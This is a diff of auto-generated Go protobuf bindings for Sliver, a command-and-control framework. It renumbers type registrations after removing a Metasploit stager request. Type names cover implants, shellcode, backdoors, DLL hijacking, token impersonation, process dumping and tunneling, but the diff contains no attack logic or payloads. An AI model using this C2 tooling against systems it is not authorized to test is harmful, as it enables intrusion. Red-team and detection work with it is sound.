+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x53, 0x6f, 0x63, 0x6b,
+ 0x73, 0x53, 0x65, 0x72, 0x76, 0x65, 0x72, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x18, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x57, 0x47, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x53, 0x65,
+ 0x72, 0x76, 0x65, 0x72, 0x73, 0x12, 0x2c, 0x0a, 0x05, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x12, 0x12,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52,
+ 0x65, 0x71, 0x1a, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x68,
+ 0x65, 0x6c, 0x6c, 0x12, 0x32, 0x0a, 0x07, 0x50, 0x6f, 0x72, 0x74, 0x66, 0x77, 0x64, 0x12, 0x14,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x6f, 0x72, 0x74, 0x66, 0x77,
+ 0x64, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
+ 0x50, 0x6f, 0x72, 0x74, 0x66, 0x77, 0x64, 0x12, 0x2f, 0x0a, 0x0b, 0x43, 0x72, 0x65, 0x61, 0x74,
+ 0x65, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x12, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x1a, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x12, 0x2e, 0x0a, 0x0a, 0x43, 0x6c, 0x6f, 0x73,
+ 0x65, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x12, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x1a, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e,
+ 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x12, 0x3a, 0x0a, 0x0a, 0x53, 0x6f, 0x63, 0x6b,
+ 0x73, 0x50, 0x72, 0x6f, 0x78, 0x79, 0x12, 0x13, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x44, 0x61, 0x74, 0x61, 0x1a, 0x13, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x6f, 0x63, 0x6b, 0x73, 0x44, 0x61, 0x74, 0x61,
+ 0x28, 0x01, 0x30, 0x01, 0x12, 0x32, 0x0a, 0x0c, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x54, 0x75,
+ 0x6e, 0x6e, 0x65, 0x6c, 0x12, 0x10, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
+ 0x54, 0x75, 0x6e, 0x6e, 0x65, 0x6c, 0x1a, 0x10, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x54, 0x75, 0x6e, 0x6e, 0x65, 0x6c, 0x12, 0x30, 0x0a, 0x0b, 0x43, 0x6c, 0x6f, 0x73,
+ 0x65, 0x54, 0x75, 0x6e, 0x6e, 0x65, 0x6c, 0x12, 0x10, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x54, 0x75, 0x6e, 0x6e, 0x65, 0x6c, 0x1a, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d,
+ 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x12, 0x3c, 0x0a, 0x0a, 0x54, 0x75,
+ 0x6e, 0x6e, 0x65, 0x6c, 0x44, 0x61, 0x74, 0x61, 0x12, 0x14, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x54, 0x75, 0x6e, 0x6e, 0x65, 0x6c, 0x44, 0x61, 0x74, 0x61, 0x1a, 0x14,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54, 0x75, 0x6e, 0x6e, 0x65, 0x6c,
+ 0x44, 0x61, 0x74, 0x61, 0x28, 0x01, 0x30, 0x01, 0x12, 0x2c, 0x0a, 0x06, 0x45, 0x76, 0x65, 0x6e,
+ 0x74, 0x73, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d,
+ 0x70, 0x74, 0x79, 0x1a, 0x0f, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x45,
+ 0x76, 0x65, 0x6e, 0x74, 0x30, 0x01, 0x42, 0x2c, 0x5a, 0x2a, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62,
+ 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x62, 0x69, 0x73, 0x68, 0x6f, 0x70, 0x66, 0x6f, 0x78, 0x2f, 0x73,
+ 0x6c, 0x69, 0x76, 0x65, 0x72, 0x2f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, 0x72,
+ 0x70, 0x63, 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33,
}
var file_rpcpb_services_proto_goTypes = []interface{}{
@@ -769,200 +765,198 @@ var file_rpcpb_services_proto_goTypes = []interface{}{
(*clientpb.RegenerateReq)(nil), // 37: clientpb.RegenerateReq
(*clientpb.DeleteReq)(nil), // 38: clientpb.DeleteReq
(*clientpb.ImplantProfile)(nil), // 39: clientpb.ImplantProfile
- (*clientpb.MsfStagerReq)(nil), // 40: clientpb.MsfStagerReq
- (*clientpb.ShellcodeRDIReq)(nil), // 41: clientpb.ShellcodeRDIReq
- (*clientpb.ShellcodeEncodeReq)(nil), // 42: clientpb.ShellcodeEncodeReq
- (*clientpb.TrafficEncoder)(nil), // 43: clientpb.TrafficEncoder
- (*clientpb.Website)(nil), // 44: clientpb.Website
- (*clientpb.WebsiteAddContent)(nil), // 45: clientpb.WebsiteAddContent
- (*clientpb.WebsiteRemoveContent)(nil), // 46: clientpb.WebsiteRemoveContent
- (*sliverpb.Ping)(nil), // 47: sliverpb.Ping
- (*sliverpb.PsReq)(nil), // 48: sliverpb.PsReq
- (*sliverpb.TerminateReq)(nil), // 49: sliverpb.TerminateReq
- (*sliverpb.IfconfigReq)(nil), // 50: sliverpb.IfconfigReq
- (*sliverpb.NetstatReq)(nil), // 51: sliverpb.NetstatReq
- (*sliverpb.LsReq)(nil), // 52: sliverpb.LsReq
- (*sliverpb.CdReq)(nil), // 53: sliverpb.CdReq
- (*sliverpb.PwdReq)(nil), // 54: sliverpb.PwdReq
- (*sliverpb.MvReq)(nil), // 55: sliverpb.MvReq
- (*sliverpb.CpReq)(nil), // 56: sliverpb.CpReq
- (*sliverpb.RmReq)(nil), // 57: sliverpb.RmReq
- (*sliverpb.MkdirReq)(nil), // 58: sliverpb.MkdirReq
- (*sliverpb.DownloadReq)(nil), // 59: sliverpb.DownloadReq
- (*sliverpb.UploadReq)(nil), // 60: sliverpb.UploadReq
- (*sliverpb.GrepReq)(nil), // 61: sliverpb.GrepReq
- (*sliverpb.ChmodReq)(nil), // 62: sliverpb.ChmodReq
- (*sliverpb.ChownReq)(nil), // 63: sliverpb.ChownReq
- (*sliverpb.ChtimesReq)(nil), // 64: sliverpb.ChtimesReq
- (*sliverpb.MemfilesListReq)(nil), // 65: sliverpb.MemfilesListReq
- (*sliverpb.MemfilesAddReq)(nil), // 66: sliverpb.MemfilesAddReq
- (*sliverpb.MemfilesRmReq)(nil), // 67: sliverpb.MemfilesRmReq
- (*sliverpb.MountReq)(nil), // 68: sliverpb.MountReq
- (*sliverpb.ProcessDumpReq)(nil), // 69: sliverpb.ProcessDumpReq
- (*sliverpb.RunAsReq)(nil), // 70: sliverpb.RunAsReq
- (*sliverpb.ImpersonateReq)(nil), // 71: sliverpb.ImpersonateReq
- (*sliverpb.RevToSelfReq)(nil), // 72: sliverpb.RevToSelfReq
- (*clientpb.GetSystemReq)(nil), // 73: clientpb.GetSystemReq
- (*sliverpb.TaskReq)(nil), // 74: sliverpb.TaskReq
- (*clientpb.MSFReq)(nil), // 75: clientpb.MSFReq
- (*clientpb.MSFRemoteReq)(nil), // 76: clientpb.MSFRemoteReq
- (*sliverpb.ExecuteAssemblyReq)(nil), // 77: sliverpb.ExecuteAssemblyReq
- (*clientpb.MigrateReq)(nil), // 78: clientpb.MigrateReq
- (*sliverpb.ExecuteReq)(nil), // 79: sliverpb.ExecuteReq
- (*sliverpb.ExecuteWindowsReq)(nil), // 80: sliverpb.ExecuteWindowsReq
- (*sliverpb.SideloadReq)(nil), // 81: sliverpb.SideloadReq
- (*sliverpb.InvokeSpawnDllReq)(nil), // 82: sliverpb.InvokeSpawnDllReq
- (*sliverpb.ScreenshotReq)(nil), // 83: sliverpb.ScreenshotReq
- (*sliverpb.CurrentTokenOwnerReq)(nil), // 84: sliverpb.CurrentTokenOwnerReq
- (*sliverpb.ServicesReq)(nil), // 85: sliverpb.ServicesReq
- (*sliverpb.ServiceDetailReq)(nil), // 86: sliverpb.ServiceDetailReq
- (*sliverpb.StartServiceByNameReq)(nil), // 87: sliverpb.StartServiceByNameReq
- (*sliverpb.PivotStartListenerReq)(nil), // 88: sliverpb.PivotStartListenerReq
- (*sliverpb.PivotStopListenerReq)(nil), // 89: sliverpb.PivotStopListenerReq
- (*sliverpb.PivotListenersReq)(nil), // 90: sliverpb.PivotListenersReq
- (*sliverpb.StartServiceReq)(nil), // 91: sliverpb.StartServiceReq
- (*sliverpb.StopServiceReq)(nil), // 92: sliverpb.StopServiceReq
- (*sliverpb.RemoveServiceReq)(nil), // 93: sliverpb.RemoveServiceReq
- (*sliverpb.MakeTokenReq)(nil), // 94: sliverpb.MakeTokenReq
- (*sliverpb.EnvReq)(nil), // 95: sliverpb.EnvReq
- (*sliverpb.SetEnvReq)(nil), // 96: sliverpb.SetEnvReq
- (*sliverpb.UnsetEnvReq)(nil), // 97: sliverpb.UnsetEnvReq
- (*clientpb.BackdoorReq)(nil), // 98: clientpb.BackdoorReq
- (*sliverpb.RegistryReadReq)(nil), // 99: sliverpb.RegistryReadReq
- (*sliverpb.RegistryWriteReq)(nil), // 100: sliverpb.RegistryWriteReq
- (*sliverpb.RegistryCreateKeyReq)(nil), // 101: sliverpb.RegistryCreateKeyReq
- (*sliverpb.RegistryDeleteKeyReq)(nil), // 102: sliverpb.RegistryDeleteKeyReq
- (*sliverpb.RegistrySubKeyListReq)(nil), // 103: sliverpb.RegistrySubKeyListReq
- (*sliverpb.RegistryListValuesReq)(nil), // 104: sliverpb.RegistryListValuesReq
- (*sliverpb.RegistryReadHiveReq)(nil), // 105: sliverpb.RegistryReadHiveReq
- (*sliverpb.SSHCommandReq)(nil), // 106: sliverpb.SSHCommandReq
- (*clientpb.DllHijackReq)(nil), // 107: clientpb.DllHijackReq
- (*sliverpb.GetPrivsReq)(nil), // 108: sliverpb.GetPrivsReq
- (*sliverpb.RportFwdStartListenerReq)(nil), // 109: sliverpb.RportFwdStartListenerReq
- (*sliverpb.RportFwdListenersReq)(nil), // 110: sliverpb.RportFwdListenersReq
- (*sliverpb.RportFwdStopListenerReq)(nil), // 111: sliverpb.RportFwdStopListenerReq
- (*sliverpb.OpenSession)(nil), // 112: sliverpb.OpenSession
- (*sliverpb.CloseSession)(nil), // 113: sliverpb.CloseSession
- (*sliverpb.RegisterExtensionReq)(nil), // 114: sliverpb.RegisterExtensionReq
- (*sliverpb.CallExtensionReq)(nil), // 115: sliverpb.CallExtensionReq
- (*sliverpb.ListExtensionsReq)(nil), // 116: sliverpb.ListExtensionsReq
- (*sliverpb.RegisterWasmExtensionReq)(nil), // 117: sliverpb.RegisterWasmExtensionReq
- (*sliverpb.ListWasmExtensionsReq)(nil), // 118: sliverpb.ListWasmExtensionsReq
- (*sliverpb.ExecWasmExtensionReq)(nil), // 119: sliverpb.ExecWasmExtensionReq
- (*sliverpb.WGPortForwardStartReq)(nil), // 120: sliverpb.WGPortForwardStartReq
- (*sliverpb.WGPortForwardStopReq)(nil), // 121: sliverpb.WGPortForwardStopReq
- (*sliverpb.WGSocksStartReq)(nil), // 122: sliverpb.WGSocksStartReq
- (*sliverpb.WGSocksStopReq)(nil), // 123: sliverpb.WGSocksStopReq
- (*sliverpb.WGTCPForwardersReq)(nil), // 124: sliverpb.WGTCPForwardersReq
- (*sliverpb.WGSocksServersReq)(nil), // 125: sliverpb.WGSocksServersReq
- (*sliverpb.ShellReq)(nil), // 126: sliverpb.ShellReq
- (*sliverpb.PortfwdReq)(nil), // 127: sliverpb.PortfwdReq
- (*sliverpb.Socks)(nil), // 128: sliverpb.Socks
- (*sliverpb.SocksData)(nil), // 129: sliverpb.SocksData
- (*sliverpb.Tunnel)(nil), // 130: sliverpb.Tunnel
- (*sliverpb.TunnelData)(nil), // 131: sliverpb.TunnelData
- (*clientpb.Version)(nil), // 132: clientpb.Version
- (*clientpb.Operators)(nil), // 133: clientpb.Operators
- (*sliverpb.Reconfigure)(nil), // 134: sliverpb.Reconfigure
- (*clientpb.Sessions)(nil), // 135: clientpb.Sessions
- (*commonpb.Response)(nil), // 136: commonpb.Response
- (*clientpb.MonitoringProviders)(nil), // 137: clientpb.MonitoringProviders
- (*clientpb.ListenerJob)(nil), // 138: clientpb.ListenerJob
- (*clientpb.Beacons)(nil), // 139: clientpb.Beacons
- (*clientpb.BeaconTasks)(nil), // 140: clientpb.BeaconTasks
- (*clientpb.Jobs)(nil), // 141: clientpb.Jobs
- (*clientpb.KillJob)(nil), // 142: clientpb.KillJob
- (*clientpb.StagerListener)(nil), // 143: clientpb.StagerListener
- (*clientpb.AllLoot)(nil), // 144: clientpb.AllLoot
- (*clientpb.AllHosts)(nil), // 145: clientpb.AllHosts
- (*clientpb.Generate)(nil), // 146: clientpb.Generate
- (*clientpb.ExternalImplantConfig)(nil), // 147: clientpb.ExternalImplantConfig
- (*clientpb.HTTPC2Configs)(nil), // 148: clientpb.HTTPC2Configs
- (*clientpb.HTTPC2Config)(nil), // 149: clientpb.HTTPC2Config
- (*clientpb.Builders)(nil), // 150: clientpb.Builders
- (*clientpb.CertificateInfo)(nil), // 151: clientpb.CertificateInfo
- (*clientpb.Crackstations)(nil), // 152: clientpb.Crackstations
- (*clientpb.CrackFiles)(nil), // 153: clientpb.CrackFiles
- (*clientpb.ImplantBuilds)(nil), // 154: clientpb.ImplantBuilds
- (*clientpb.Canaries)(nil), // 155: clientpb.Canaries
- (*clientpb.WGClientConfig)(nil), // 156: clientpb.WGClientConfig
- (*clientpb.UniqueWGIP)(nil), // 157: clientpb.UniqueWGIP
- (*clientpb.ImplantProfiles)(nil), // 158: clientpb.ImplantProfiles
- (*clientpb.MsfStager)(nil), // 159: clientpb.MsfStager
- (*clientpb.ShellcodeRDI)(nil), // 160: clientpb.ShellcodeRDI
- (*clientpb.Compiler)(nil), // 161: clientpb.Compiler
- (*clientpb.ShellcodeEncode)(nil), // 162: clientpb.ShellcodeEncode
- (*clientpb.ShellcodeEncoderMap)(nil), // 163: clientpb.ShellcodeEncoderMap
- (*clientpb.TrafficEncoderMap)(nil), // 164: clientpb.TrafficEncoderMap
- (*clientpb.TrafficEncoderTests)(nil), // 165: clientpb.TrafficEncoderTests
- (*clientpb.Websites)(nil), // 166: clientpb.Websites
- (*sliverpb.Ps)(nil), // 167: sliverpb.Ps
- (*sliverpb.Terminate)(nil), // 168: sliverpb.Terminate
- (*sliverpb.Ifconfig)(nil), // 169: sliverpb.Ifconfig
- (*sliverpb.Netstat)(nil), // 170: sliverpb.Netstat
- (*sliverpb.Ls)(nil), // 171: sliverpb.Ls
- (*sliverpb.Pwd)(nil), // 172: sliverpb.Pwd
- (*sliverpb.Mv)(nil), // 173: sliverpb.Mv
- (*sliverpb.Cp)(nil), // 174: sliverpb.Cp
- (*sliverpb.Rm)(nil), // 175: sliverpb.Rm
- (*sliverpb.Mkdir)(nil), // 176: sliverpb.Mkdir
- (*sliverpb.Download)(nil), // 177: sliverpb.Download
- (*sliverpb.Upload)(nil), // 178: sliverpb.Upload
- (*sliverpb.Grep)(nil), // 179: sliverpb.Grep
- (*sliverpb.Chmod)(nil), // 180: sliverpb.Chmod
- (*sliverpb.Chown)(nil), // 181: sliverpb.Chown
- (*sliverpb.Chtimes)(nil), // 182: sliverpb.Chtimes
- (*sliverpb.MemfilesAdd)(nil), // 183: sliverpb.MemfilesAdd
- (*sliverpb.MemfilesRm)(nil), // 184: sliverpb.MemfilesRm
- (*sliverpb.Mount)(nil), // 185: sliverpb.Mount
- (*sliverpb.ProcessDump)(nil), // 186: sliverpb.ProcessDump
- (*sliverpb.RunAs)(nil), // 187: sliverpb.RunAs
- (*sliverpb.Impersonate)(nil), // 188: sliverpb.Impersonate
- (*sliverpb.RevToSelf)(nil), // 189: sliverpb.RevToSelf
- (*sliverpb.GetSystem)(nil), // 190: sliverpb.GetSystem
- (*sliverpb.Task)(nil), // 191: sliverpb.Task
- (*sliverpb.ExecuteAssembly)(nil), // 192: sliverpb.ExecuteAssembly
- (*sliverpb.Migrate)(nil), // 193: sliverpb.Migrate
- (*sliverpb.Execute)(nil), // 194: sliverpb.Execute
- (*sliverpb.Sideload)(nil), // 195: sliverpb.Sideload
- (*sliverpb.SpawnDll)(nil), // 196: sliverpb.SpawnDll
- (*sliverpb.Screenshot)(nil), // 197: sliverpb.Screenshot
- (*sliverpb.CurrentTokenOwner)(nil), // 198: sliverpb.CurrentTokenOwner
- (*sliverpb.Services)(nil), // 199: sliverpb.Services
- (*sliverpb.ServiceDetail)(nil), // 200: sliverpb.ServiceDetail
- (*sliverpb.ServiceInfo)(nil), // 201: sliverpb.ServiceInfo
- (*sliverpb.PivotListener)(nil), // 202: sliverpb.PivotListener
- (*sliverpb.PivotListeners)(nil), // 203: sliverpb.PivotListeners
- (*clientpb.PivotGraph)(nil), // 204: clientpb.PivotGraph
- (*sliverpb.MakeToken)(nil), // 205: sliverpb.MakeToken
- (*sliverpb.EnvInfo)(nil), // 206: sliverpb.EnvInfo
- (*sliverpb.SetEnv)(nil), // 207: sliverpb.SetEnv
- (*sliverpb.UnsetEnv)(nil), // 208: sliverpb.UnsetEnv
- (*clientpb.Backdoor)(nil), // 209: clientpb.Backdoor
- (*sliverpb.RegistryRead)(nil), // 210: sliverpb.RegistryRead
- (*sliverpb.RegistryWrite)(nil), // 211: sliverpb.RegistryWrite
- (*sliverpb.RegistryCreateKey)(nil), // 212: sliverpb.RegistryCreateKey
- (*sliverpb.RegistryDeleteKey)(nil), // 213: sliverpb.RegistryDeleteKey
- (*sliverpb.RegistrySubKeyList)(nil), // 214: sliverpb.RegistrySubKeyList
- (*sliverpb.RegistryValuesList)(nil), // 215: sliverpb.RegistryValuesList
- (*sliverpb.RegistryReadHive)(nil), // 216: sliverpb.RegistryReadHive
- (*sliverpb.SSHCommand)(nil), // 217: sliverpb.SSHCommand
- (*clientpb.DllHijack)(nil), // 218: clientpb.DllHijack
- (*sliverpb.GetPrivs)(nil), // 219: sliverpb.GetPrivs
- (*sliverpb.RportFwdListener)(nil), // 220: sliverpb.RportFwdListener
- (*sliverpb.RportFwdListeners)(nil), // 221: sliverpb.RportFwdListeners
- (*sliverpb.RegisterExtension)(nil), // 222: sliverpb.RegisterExtension
- (*sliverpb.CallExtension)(nil), // 223: sliverpb.CallExtension
- (*sliverpb.ListExtensions)(nil), // 224: sliverpb.ListExtensions
- (*sliverpb.RegisterWasmExtension)(nil), // 225: sliverpb.RegisterWasmExtension
- (*sliverpb.ListWasmExtensions)(nil), // 226: sliverpb.ListWasmExtensions
- (*sliverpb.ExecWasmExtension)(nil), // 227: sliverpb.ExecWasmExtension
- (*sliverpb.WGPortForward)(nil), // 228: sliverpb.WGPortForward
- (*sliverpb.WGSocks)(nil), // 229: sliverpb.WGSocks
- (*sliverpb.WGTCPForwarders)(nil), // 230: sliverpb.WGTCPForwarders
- (*sliverpb.WGSocksServers)(nil), // 231: sliverpb.WGSocksServers
- (*sliverpb.Shell)(nil), // 232: sliverpb.Shell
- (*sliverpb.Portfwd)(nil), // 233: sliverpb.Portfwd
+ (*clientpb.ShellcodeRDIReq)(nil), // 40: clientpb.ShellcodeRDIReq
+ (*clientpb.ShellcodeEncodeReq)(nil), // 41: clientpb.ShellcodeEncodeReq
+ (*clientpb.TrafficEncoder)(nil), // 42: clientpb.TrafficEncoder
+ (*clientpb.Website)(nil), // 43: clientpb.Website
+ (*clientpb.WebsiteAddContent)(nil), // 44: clientpb.WebsiteAddContent
+ (*clientpb.WebsiteRemoveContent)(nil), // 45: clientpb.WebsiteRemoveContent
+ (*sliverpb.Ping)(nil), // 46: sliverpb.Ping
+ (*sliverpb.PsReq)(nil), // 47: sliverpb.PsReq
+ (*sliverpb.TerminateReq)(nil), // 48: sliverpb.TerminateReq
+ (*sliverpb.IfconfigReq)(nil), // 49: sliverpb.IfconfigReq
+ (*sliverpb.NetstatReq)(nil), // 50: sliverpb.NetstatReq
+ (*sliverpb.LsReq)(nil), // 51: sliverpb.LsReq
+ (*sliverpb.CdReq)(nil), // 52: sliverpb.CdReq
+ (*sliverpb.PwdReq)(nil), // 53: sliverpb.PwdReq
+ (*sliverpb.MvReq)(nil), // 54: sliverpb.MvReq
+ (*sliverpb.CpReq)(nil), // 55: sliverpb.CpReq
+ (*sliverpb.RmReq)(nil), // 56: sliverpb.RmReq
+ (*sliverpb.MkdirReq)(nil), // 57: sliverpb.MkdirReq
+ (*sliverpb.DownloadReq)(nil), // 58: sliverpb.DownloadReq
+ (*sliverpb.UploadReq)(nil), // 59: sliverpb.UploadReq
+ (*sliverpb.GrepReq)(nil), // 60: sliverpb.GrepReq
+ (*sliverpb.ChmodReq)(nil), // 61: sliverpb.ChmodReq
+ (*sliverpb.ChownReq)(nil), // 62: sliverpb.ChownReq
+ (*sliverpb.ChtimesReq)(nil), // 63: sliverpb.ChtimesReq
+ (*sliverpb.MemfilesListReq)(nil), // 64: sliverpb.MemfilesListReq
+ (*sliverpb.MemfilesAddReq)(nil), // 65: sliverpb.MemfilesAddReq
+ (*sliverpb.MemfilesRmReq)(nil), // 66: sliverpb.MemfilesRmReq
+ (*sliverpb.MountReq)(nil), // 67: sliverpb.MountReq
+ (*sliverpb.ProcessDumpReq)(nil), // 68: sliverpb.ProcessDumpReq
+ (*sliverpb.RunAsReq)(nil), // 69: sliverpb.RunAsReq
+ (*sliverpb.ImpersonateReq)(nil), // 70: sliverpb.ImpersonateReq
+ (*sliverpb.RevToSelfReq)(nil), // 71: sliverpb.RevToSelfReq
+ (*clientpb.GetSystemReq)(nil), // 72: clientpb.GetSystemReq
+ (*sliverpb.TaskReq)(nil), // 73: sliverpb.TaskReq
+ (*clientpb.MSFReq)(nil), // 74: clientpb.MSFReq
+ (*clientpb.MSFRemoteReq)(nil), // 75: clientpb.MSFRemoteReq
+ (*sliverpb.ExecuteAssemblyReq)(nil), // 76: sliverpb.ExecuteAssemblyReq
+ (*clientpb.MigrateReq)(nil), // 77: clientpb.MigrateReq
+ (*sliverpb.ExecuteReq)(nil), // 78: sliverpb.ExecuteReq
+ (*sliverpb.ExecuteWindowsReq)(nil), // 79: sliverpb.ExecuteWindowsReq
+ (*sliverpb.SideloadReq)(nil), // 80: sliverpb.SideloadReq
+ (*sliverpb.InvokeSpawnDllReq)(nil), // 81: sliverpb.InvokeSpawnDllReq
+ (*sliverpb.ScreenshotReq)(nil), // 82: sliverpb.ScreenshotReq
+ (*sliverpb.CurrentTokenOwnerReq)(nil), // 83: sliverpb.CurrentTokenOwnerReq
+ (*sliverpb.ServicesReq)(nil), // 84: sliverpb.ServicesReq
+ (*sliverpb.ServiceDetailReq)(nil), // 85: sliverpb.ServiceDetailReq
+ (*sliverpb.StartServiceByNameReq)(nil), // 86: sliverpb.StartServiceByNameReq
+ (*sliverpb.PivotStartListenerReq)(nil), // 87: sliverpb.PivotStartListenerReq
+ (*sliverpb.PivotStopListenerReq)(nil), // 88: sliverpb.PivotStopListenerReq
+ (*sliverpb.PivotListenersReq)(nil), // 89: sliverpb.PivotListenersReq
+ (*sliverpb.StartServiceReq)(nil), // 90: sliverpb.StartServiceReq
+ (*sliverpb.StopServiceReq)(nil), // 91: sliverpb.StopServiceReq
+ (*sliverpb.RemoveServiceReq)(nil), // 92: sliverpb.RemoveServiceReq
+ (*sliverpb.MakeTokenReq)(nil), // 93: sliverpb.MakeTokenReq
+ (*sliverpb.EnvReq)(nil), // 94: sliverpb.EnvReq
+ (*sliverpb.SetEnvReq)(nil), // 95: sliverpb.SetEnvReq
+ (*sliverpb.UnsetEnvReq)(nil), // 96: sliverpb.UnsetEnvReq
+ (*clientpb.BackdoorReq)(nil), // 97: clientpb.BackdoorReq
+ (*sliverpb.RegistryReadReq)(nil), // 98: sliverpb.RegistryReadReq
+ (*sliverpb.RegistryWriteReq)(nil), // 99: sliverpb.RegistryWriteReq
+ (*sliverpb.RegistryCreateKeyReq)(nil), // 100: sliverpb.RegistryCreateKeyReq
+ (*sliverpb.RegistryDeleteKeyReq)(nil), // 101: sliverpb.RegistryDeleteKeyReq
+ (*sliverpb.RegistrySubKeyListReq)(nil), // 102: sliverpb.RegistrySubKeyListReq
+ (*sliverpb.RegistryListValuesReq)(nil), // 103: sliverpb.RegistryListValuesReq
+ (*sliverpb.RegistryReadHiveReq)(nil), // 104: sliverpb.RegistryReadHiveReq
+ (*sliverpb.SSHCommandReq)(nil), // 105: sliverpb.SSHCommandReq
+ (*clientpb.DllHijackReq)(nil), // 106: clientpb.DllHijackReq
+ (*sliverpb.GetPrivsReq)(nil), // 107: sliverpb.GetPrivsReq
+ (*sliverpb.RportFwdStartListenerReq)(nil), // 108: sliverpb.RportFwdStartListenerReq
+ (*sliverpb.RportFwdListenersReq)(nil), // 109: sliverpb.RportFwdListenersReq
+ (*sliverpb.RportFwdStopListenerReq)(nil), // 110: sliverpb.RportFwdStopListenerReq
+ (*sliverpb.OpenSession)(nil), // 111: sliverpb.OpenSession
+ (*sliverpb.CloseSession)(nil), // 112: sliverpb.CloseSession
+ (*sliverpb.RegisterExtensionReq)(nil), // 113: sliverpb.RegisterExtensionReq
+ (*sliverpb.CallExtensionReq)(nil), // 114: sliverpb.CallExtensionReq
+ (*sliverpb.ListExtensionsReq)(nil), // 115: sliverpb.ListExtensionsReq
+ (*sliverpb.RegisterWasmExtensionReq)(nil), // 116: sliverpb.RegisterWasmExtensionReq
+ (*sliverpb.ListWasmExtensionsReq)(nil), // 117: sliverpb.ListWasmExtensionsReq
+ (*sliverpb.ExecWasmExtensionReq)(nil), // 118: sliverpb.ExecWasmExtensionReq
+ (*sliverpb.WGPortForwardStartReq)(nil), // 119: sliverpb.WGPortForwardStartReq
+ (*sliverpb.WGPortForwardStopReq)(nil), // 120: sliverpb.WGPortForwardStopReq
+ (*sliverpb.WGSocksStartReq)(nil), // 121: sliverpb.WGSocksStartReq
+ (*sliverpb.WGSocksStopReq)(nil), // 122: sliverpb.WGSocksStopReq
+ (*sliverpb.WGTCPForwardersReq)(nil), // 123: sliverpb.WGTCPForwardersReq
+ (*sliverpb.WGSocksServersReq)(nil), // 124: sliverpb.WGSocksServersReq
+ (*sliverpb.ShellReq)(nil), // 125: sliverpb.ShellReq
+ (*sliverpb.PortfwdReq)(nil), // 126: sliverpb.PortfwdReq
+ (*sliverpb.Socks)(nil), // 127: sliverpb.Socks
+ (*sliverpb.SocksData)(nil), // 128: sliverpb.SocksData
+ (*sliverpb.Tunnel)(nil), // 129: sliverpb.Tunnel
+ (*sliverpb.TunnelData)(nil), // 130: sliverpb.TunnelData
+ (*clientpb.Version)(nil), // 131: clientpb.Version
+ (*clientpb.Operators)(nil), // 132: clientpb.Operators
+ (*sliverpb.Reconfigure)(nil), // 133: sliverpb.Reconfigure
+ (*clientpb.Sessions)(nil), // 134: clientpb.Sessions
+ (*commonpb.Response)(nil), // 135: commonpb.Response
+ (*clientpb.MonitoringProviders)(nil), // 136: clientpb.MonitoringProviders
+ (*clientpb.ListenerJob)(nil), // 137: clientpb.ListenerJob
+ (*clientpb.Beacons)(nil), // 138: clientpb.Beacons
+ (*clientpb.BeaconTasks)(nil), // 139: clientpb.BeaconTasks
+ (*clientpb.Jobs)(nil), // 140: clientpb.Jobs
+ (*clientpb.KillJob)(nil), // 141: clientpb.KillJob
+ (*clientpb.StagerListener)(nil), // 142: clientpb.StagerListener
+ (*clientpb.AllLoot)(nil), // 143: clientpb.AllLoot
+ (*clientpb.AllHosts)(nil), // 144: clientpb.AllHosts
+ (*clientpb.Generate)(nil), // 145: clientpb.Generate
